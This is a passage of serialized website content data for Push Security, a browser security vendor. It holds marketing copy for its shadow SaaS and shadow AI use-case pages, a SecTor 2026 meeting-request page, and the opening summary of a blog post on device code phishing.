ends.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc1ecc2d5d3814b62b072fac01827ff96",{"large":905},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":907,"meta":908,"component":909,"responsiveStyles":911},"builder-5e8ae39655274de89da32ab573a2525a",{"previousId":667},{"name":253,"options":910,"isRSC":118},{"darkMode":6},{"large":912},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":914,"component":915,"responsiveStyles":917},"builder-dfd6850cfb4741d2b8a0c16c2780f00a",{"name":315,"tag":315,"options":916,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":918},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":920,"@type":106,"tagName":131,"properties":921,"responsiveStyles":922},"builder-pixel-sa9l8kzicdd",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":923},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":925},{"path":31,"query":926},{},{},1770892908052,1745427419274,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb07017bfd318431690a5bb35bda35b99",[],{"kind":337,"breakpoints":933,"originalContentId":579,"winningTest":118,"lastPreviewUrl":934,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/incident-response?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.a9d5556e77f84a37b5bd52310a7110c1=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.use-case-page:/uc/incident-response=a9d5556e77f84a37b5bd52310a7110c1&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":936,"id":937,"name":938,"modelId":159,"published":13,"query":939,"data":942,"variations":1047,"lastUpdated":1048,"firstPublished":1049,"testRatio":42,"screenshot":1050,"createdBy":43,"lastUpdatedBy":332,"folders":1051,"meta":1052,"rev":339},1746122471259,"5f118e24433d46ceb79f5099987156d7","Shadow SaaS",[940],{"@type":162,"property":163,"operator":164,"value":941},"/uc/shadow-saas",{"seoTitle":943,"seoDescription":944,"customFonts":945,"fontAwesomeIcon":950,"title":951,"jsCode":31,"tsCode":31,"blocks":952,"url":941,"state":1044},"Find and secure shadow SaaS","See and control shadow SaaS in the browser.",[946],{"kind":174,"variants":947,"files":948,"family":178,"version":172,"subsets":949,"lastModified":173,"category":198,"menu":197},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"300italic":214,"500italic":209,"regular":210,"900italic":208,"italic":216,"100italic":211,"200italic":212,"600italic":217,"700italic":213,"800italic":215},[176,177],"faShieldCheck","Secure shadow SaaS",[953,1039],{"@type":106,"@version":107,"tagName":221,"id":954,"meta":955,"children":956},"builder-04da805c4cd34652a2db452fcda52e1d",{"previousId":833},[957,973,980,987,996,1006,1016,1026,1033],{"@type":106,"@version":107,"id":958,"meta":959,"component":960,"responsiveStyles":971},"builder-830d414faeaf41439142f9157e8288c8",{"previousId":837},{"name":225,"options":961,"isRSC":118},{"title":943,"description":962,"points":963,"video":970},"\u003Cp>SaaS sprawl is one of today’s fastest-growing security blind spots because most tools monitor around the edges. Push sees it at the source, in the browser, revealing every app users access, flagging risky tools, and helping you shut down exposure before it leads to a breach. No guesswork. No nasty surprises. Just real-time visibility and control.\u003C/p>",[964,966,968],{"item":965},"Discover every SaaS app users access, managed or not",{"item":967},"Spot accounts with weak security postures like missing MFA, unmanaged access, and no SSO",{"item":969},"Control usage with in-browser prompts, blocks, and security guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F3e4eece318d04d6586e691d59d0741cf%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=3e4eece318d04d6586e691d59d0741cf&alt=media&optimized=true",{"large":972},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":974,"meta":975,"component":976,"responsiveStyles":978},"builder-cd7833f966cb4c7e8adf0d6c979414a6",{"previousId":854},{"name":244,"options":977,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":979},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":981,"meta":982,"component":983,"responsiveStyles":985},"builder-49d720b45430454e8b08c526f267c19f",{"previousId":861},{"name":253,"options":984,"isRSC":118},{"darkMode":246},{"large":986},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":988,"component":989,"responsiveStyles":994},"builder-3dde0bf6c8544e5e9ab41b18a9d68034",{"name":258,"tag":258,"options":990,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":991,"description":992,"image":993,"reverse":6},"\u003Ch2>Use your browser to curb Saas Sprawl\u003C/h2>","\u003Cp>Shadow SaaS isn’t hiding in your network, it’s in your browser. From AI tools to unsanctioned file-sharing sites, security risks live in the apps your users sign into every day. Push maps your organization's true SaaS footprint in real time, exposing apps and accounts with unmanaged access, poor authentication, or no security oversight.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6811a214c7949b6bbe0b9a3bca62efd",{"large":995},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":997,"meta":998,"component":999,"responsiveStyles":1004},"builder-e2420451ccdc4f088d0a4904cff45935",{"previousId":877},{"name":272,"options":1000,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":1001,"description":1002,"reverse":246,"image":1003},"\u003Ch2>Discover hidden SaaS usage\u003C/h2>","\u003Cp>Push captures live browser telemetry across every tab and session. Whether a user signs into a sanctioned app with a personal account or tries a new AI plugin, you’ll see it in real time, with no integrations or manual tagging.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe16e301f9af94665b95d98232a863d8a",{"large":1005},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":1007,"meta":1008,"component":1009,"responsiveStyles":1014},"builder-b36de7fce7994beea9e58d94662e7166",{"previousId":887},{"name":272,"options":1010,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":1011,"description":1012,"reverse":6,"image":1013},"\u003Ch2>Spot risky access and unsafe usage\u003C/h2>","\u003Cp>Discovery is just the beginning. Push flags apps with risky traits, no MFA, no SSO, known vulnerabilities, or broad access scopes. You’ll know which tools introduce real risk, and which users are exposed so you can act with precision.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6585f3c242da4d70ae3cb7d02f481bef",{"large":1015},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":1017,"meta":1018,"component":1019,"responsiveStyles":1024},"builder-dc366b5134684fe7a508edf8913103ea",{"previousId":897},{"name":272,"options":1020,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":1021,"description":1022,"reverse":246,"image":1023},"\u003Ch2>Close gaps before they grow\u003C/h2>","\u003Cp>Push turns insight into action. When risky SaaS use is detected, guide users to enable MFA, block high-risk apps, or apply in-browser guardrails automatically. All without deploying new infrastructure or managing dozens of integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe6d60b6d91414819bc6258a318f00557",{"large":1025},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":1027,"meta":1028,"component":1029,"responsiveStyles":1031},"builder-8708f6f0d8da4b3f9e17bf16cda70219",{"previousId":907},{"name":253,"options":1030,"isRSC":118},{"darkMode":6},{"large":1032},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1034,"component":1035,"responsiveStyles":1037},"builder-8ff4b38d60534cf28cb523ab0f754875",{"name":315,"tag":315,"options":1036,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":1038},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1040,"@type":106,"tagName":131,"properties":1041,"responsiveStyles":1042},"builder-pixel-eglk0rx2b8f",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":1043},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1045},{"path":31,"query":1046},{},{},1770892936802,1746714967208,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01bfb2304521412fbd2e1a1180904d40",[],{"originalContentId":817,"winningTest":118,"lastPreviewUrl":1053,"breakpoints":1054,"kind":337,"hasLinks":6,"hasAutosaves":6},"https://pushsecurity.com/uc/shadow-saas?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=5f118e24433d46ceb79f5099987156d7&builder.overrides.5f118e24433d46ceb79f5099987156d7=5f118e24433d46ceb79f5099987156d7&builder.overrides.use-case-page:/uc/shadow-saas=5f118e24433d46ceb79f5099987156d7&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":1056,"id":1057,"name":1058,"modelId":159,"published":13,"query":1059,"data":1062,"variations":1166,"lastUpdated":1167,"firstPublished":1168,"testRatio":42,"screenshot":1169,"createdBy":43,"lastUpdatedBy":332,"folders":1170,"meta":1171,"rev":339},1764707470172,"b62629ce2f3741158d961cd10fe74b31","Shadow AI",[1060],{"@type":162,"property":163,"operator":164,"value":1061},"/uc/shadow-ai",{"fontAwesomeIcon":1063,"seoTitle":1064,"jsCode":31,"customFonts":1065,"title":1070,"tsCode":31,"seoDescription":1071,"blocks":1072,"url":1061,"state":1163},"faBrainCircuit","Secure AI native and AI enhanced apps. ",[1066],{"variants":1067,"category":198,"files":1068,"subsets":1069,"family":178,"kind":174,"menu":197,"lastModified":173,"version":172},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"800italic":215,"regular":210,"700italic":213,"200italic":212,"italic":216,"500italic":209,"600italic":217,"300italic":214,"100italic":211,"900italic":208},[176,177],"Secure shadow AI","See and control shadow AI apps in the browser.",[1073,1158],{"@type":106,"@version":107,"tagName":221,"id":1074,"meta":1075,"children":1076},"builder-a6e5717a2c914d5695058e4ee201a05d",{"previousId":954},[1077,1093,1100,1107,1117,1126,1135,1145,1152],{"@type":106,"@version":107,"id":1078,"meta":1079,"component":1080,"responsiveStyles":1091},"builder-3e0ed678683f4a0eb7aa00253cf263b2",{"previousId":958},{"name":225,"options":1081,"isRSC":118},{"title":1070,"description":1082,"points":1083,"image":1090},"\u003Cp>Your employees are adopting AI faster than you can track it. From native features in corporate apps to unapproved shadow tools, it’s all happening in the browser. Push detects every AI interaction in real time, letting you categorize apps and enforce acceptable use policies in the browser.\u003C/p>",[1084,1086,1088],{"item":1085},"Map every AI tool used across your workforce",{"item":1087},"Review and classify apps by sensitivity, purpose, and policy status",{"item":1089},"Enforce AI usage rules directly in the browser","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F33cf153d920f4e389f3650253577cff7",{"large":1092},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":1094,"meta":1095,"component":1096,"responsiveStyles":1098},"builder-76968f8471d14893b8189d75b08fb426",{"previousId":974},{"name":244,"options":1097,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":1099},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":1101,"meta":1102,"component":1103,"responsiveStyles":1105},"builder-b55b9d4bc5a649d8839ce7f6c2043d95",{"previousId":981},{"name":253,"options":1104,"isRSC":118},{"darkMode":246},{"large":1106},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1108,"meta":1109,"component":1110,"responsiveStyles":1115},"builder-c3f38ef4d75d4989a29b5903175ed8a1",{"previousId":988},{"name":258,"tag":258,"options":1111,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":1112,"description":1113,"image":1114,"reverse":6},"\u003Ch2>Use your browser to govern AI \u003C/h2>","\u003Cp>The AI footprint inside your company is bigger than you think. From text generators to meeting assistants and design copilots, employees test, adopt, and connect new tools constantly. Push shows you those tools and which users are accessing them, without relying on network scans or API integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F30b43bda6f1644c19478fb1efa20050c",{"large":1116},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1118,"meta":1119,"component":1120,"responsiveStyles":1124},"builder-90ee9cb9afc44e7f885523715bf51a53",{"previousId":997},{"name":272,"options":1121,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":1122,"description":1123,"reverse":246,"image":1013},"\u003Ch2>Discover every AI tool users touch\u003C/h2>","\u003Cp>Push captures live telemetry from the browser, identifying every AI-native and AI-enhanced application users access. You’ll know which corporate identities are connected, how data flows, and what new AI apps appear across your environment. \u003C/p>",{"large":1125},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":1127,"meta":1128,"component":1129,"responsiveStyles":1133},"builder-9e44539fa53c4d8e87406036c921fc46",{"previousId":1007},{"name":272,"options":1130,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":1131,"description":1132,"reverse":6,"image":1023},"\u003Ch2>Classify and manage AI risk\u003C/h2>","\u003Cp>For apps you choose to allow, Push lets you apply custom in-browser banners. You can bulk-select categories of AI tools and require users to read and acknowledge your acceptable use policy before they proceed. This creates an auditable trail and moves policy from an easy to forget document to an active, in-workflow control.\u003C/p>",{"large":1134},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":1136,"meta":1137,"component":1138,"responsiveStyles":1143},"builder-44c1a891926f4bdeaaa37e90721fe6ac",{"previousId":1017},{"name":272,"options":1139,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":1140,"description":1141,"reverse":246,"image":1142},"\u003Ch2>Enforce your AI policy in the browser\u003C/h2>","\u003Cp>When an AI tool is deemed non-compliant or too risky, Push blocks it at the source. The block happens directly in the browser, preventing the user from accessing the site or submitting data. This gives you an immediate, powerful lever to stop data exfiltration and enforce a hard line on unacceptable risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa359ac1805af4e15a8a7f84632b9bb55",{"large":1144},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":1146,"meta":1147,"component":1148,"responsiveStyles":1150},"builder-dcc906f9cbe54dc68b3c672668e7a38f",{"previousId":1027},{"name":253,"options":1149,"isRSC":118},{"darkMode":6},{"large":1151},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1153,"component":1154,"responsiveStyles":1156},"builder-d2d64780c31b4349bc75805b23a07e38",{"name":315,"tag":315,"options":1155,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":1157},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1159,"@type":106,"tagName":131,"properties":1160,"responsiveStyles":1161},"builder-pixel-bxhhzkqjopn",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":1162},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1164},{"path":31,"query":1165},{},{},1770892957225,1764950077593,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe558b8b069884037a8e6904f7ecc029c",[],{"winningTest":118,"breakpoints":1172,"originalContentId":937,"kind":337,"lastPreviewUrl":1173,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/shadow-ai?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=b62629ce2f3741158d961cd10fe74b31&builder.overrides.b62629ce2f3741158d961cd10fe74b31=b62629ce2f3741158d961cd10fe74b31&builder.overrides.use-case-page:/uc/shadow-ai=b62629ce2f3741158d961cd10fe74b31&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":1175,"id":1176,"name":1177,"modelId":1178,"meta":1179,"query":1183,"data":1186,"variations":1233,"lastUpdated":1234,"testRatio":42,"screenshot":1235,"createdBy":53,"lastUpdatedBy":53,"folders":1236,"published":13,"firstPublished":1237,"rev":1238},1775507978857,"fe87fe4ed49e46538702183037ff8688","SecTor 2026","1c777f9969064926b1250dd130dcb0d2",{"breakpoints":1180,"originalContentId":1181,"hasAutosaves":246,"lastPreviewUrl":1182,"winningTest":118,"hasLinks":6,"kind":337},{"xsmall":57,"small":33,"medium":34},"4af42b108760494a870a9ea307ebf565","https://pushsecurity.com/events/sector-2026?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=events-pages&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.events-pages=fe87fe4ed49e46538702183037ff8688&builder.overrides.fe87fe4ed49e46538702183037ff8688=fe87fe4ed49e46538702183037ff8688&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",[1184],{"@type":162,"property":163,"operator":164,"value":1185},"/events/sector-2026",{"inputs":1187,"seoTitle":1188,"title":1189,"date":1190,"seoDescription":1193,"themeId":6,"cardImage":1194,"ogImage":1194,"blocks":1195,"url":1185,"state":1227},[],"Meet with Push Security at SecTor","Toronto, ON",{"startEventDate":1191,"endEventDate":1192},1791259200000,1791518340000,"Sit down with a Push expert to learn how the Push platform can defend your organization.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18dd52ad78e84e09931a4017dce5c430",[1196,1212,1222],{"@type":106,"@version":107,"id":1197,"meta":1198,"component":1200,"responsiveStyles":1210},"builder-55b0aae98a60436397c41a99e0110de4",{"previousId":1199},"builder-1d79d05db5f04037b1e8e18627dc1aa4",{"name":1201,"tag":1201,"options":1202,"isRSC":118},"EventsFormContainer",{"workEmailOnly":6,"showRecaptchaText":246,"title":1188,"description":1203,"formTitle":1204,"prodFormId":1205,"successTitle":1206,"successDescription":1207,"segmentFriendlyName":1208,"segmentId":1209},"\u003Cp>\u003Cbr />\u003C/p>\n\u003Cp>Sit down with one of our experts to learn more about how the Push platform can defend your organization where attacks actually happen: in the browser.\u003C/p>\n\u003Cp>\u003Cbr />\u003C/p>\n\u003Cp>\u003Cimg src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0f82cc19e3f543f8a7e72f267c954819\" />\u003C/p>\n\u003Cdiv class=\"relative py-8 sm:px-5\">\n  \u003Cdiv class=\"text-center md:text-left text-[#9e9e9e] text-base mb-5\">Trusted by:\u003C/div>\n  \u003Cdiv class=\"justify-center md:justify-start flex flex-row flex-wrap items-center gap-x-8 sm:gap-x-10 gap-y-4\">\n    \n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://sophos.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Sophos\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://gitlab.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Gitlab\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://cribl.io/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Cribl\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://www.greynoise.io/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"greynoise\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://portswigger.net/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Portswigger\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://thinkst.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Thinkst\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242\">\u003C/a>\n    \u003C/div>\n    \n  \u003C/div>\n\u003C/div>","Request a meeting","4735aca8-b197-4521-a96f-024b25759d4d","\u003Cp>Meeting request received\u003C/p>","\u003Cp>Thank you! We'll reach out to coordinate a Push expert meeting at the event.\u003C/p>","Request a Black Hat Meeting","request_a_meeting",{"large":1211},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1213,"meta":1214,"component":1216,"responsiveStyles":1220},"builder-8b5819ec4e9e478382a2d4674cdfd248",{"previousId":1215},"builder-c57afa4c7b344be096d1f740aef6f8c2",{"name":1217,"options":1218,"isRSC":118},"Custom Code",{"code":1219,"scriptsClientOnly":6},"\u003Cstyle>\n  .filter-white { filter: brightness(0) invert(1); }\n  .py-28 {display:none;}\n\u003C/style>\n",{"large":1221},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1223,"@type":106,"tagName":131,"properties":1224,"responsiveStyles":1225},"builder-pixel-geljwlrgd5f",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":1226},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1228},{"pathname":1185,"path":1229,"query":1232},[1230,1231],"events","sector-2026",{},{},1775508397062,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0bd2c1f93bab4cefbaa44426c1e03a95",[],1775570814295,"69g6o7tjq46",[1240,6657,9839,12932],{"_path":1241,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":1243,"ogImage":118,"summary":1246,"title":1260,"subtitle":118,"metaTitle":1261,"synopsis":1262,"hashTags":118,"publishedDate":1263,"slug":1264,"tagsCollection":1265,"relatedBlogPostsCollection":1275,"authorsCollection":3777,"content":3781,"_id":6652,"_type":6653,"_source":6654,"_file":6655,"_stem":6656,"_extension":6653},"/blog/device-code-phishing","blog",{"id":1244,"publishedAt":1245},"5DmCqTU2Tg4adYScA5vT2x","2026-04-07T09:00:13.964Z",{"json":1247},{"data":1248,"content":1249,"nodeType":1259},{},[1250],{"data":1251,"content":1252,"nodeType":1258},{},[1253],{"data":1254,"marks":1255,"value":1256,"nodeType":1257},{},[],"Device code phishing is an account takeover technique that abuses the OAuth 2.0 Device Authorization Grant to steal access tokens while bypassing standard access controls (like passwords, MFA, and even passkeys).","text","paragraph","document","Device code phishing attacks have skyrocketed: here’s what you need to know","Analysing the rise in device code phishing attacks in 2026","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access 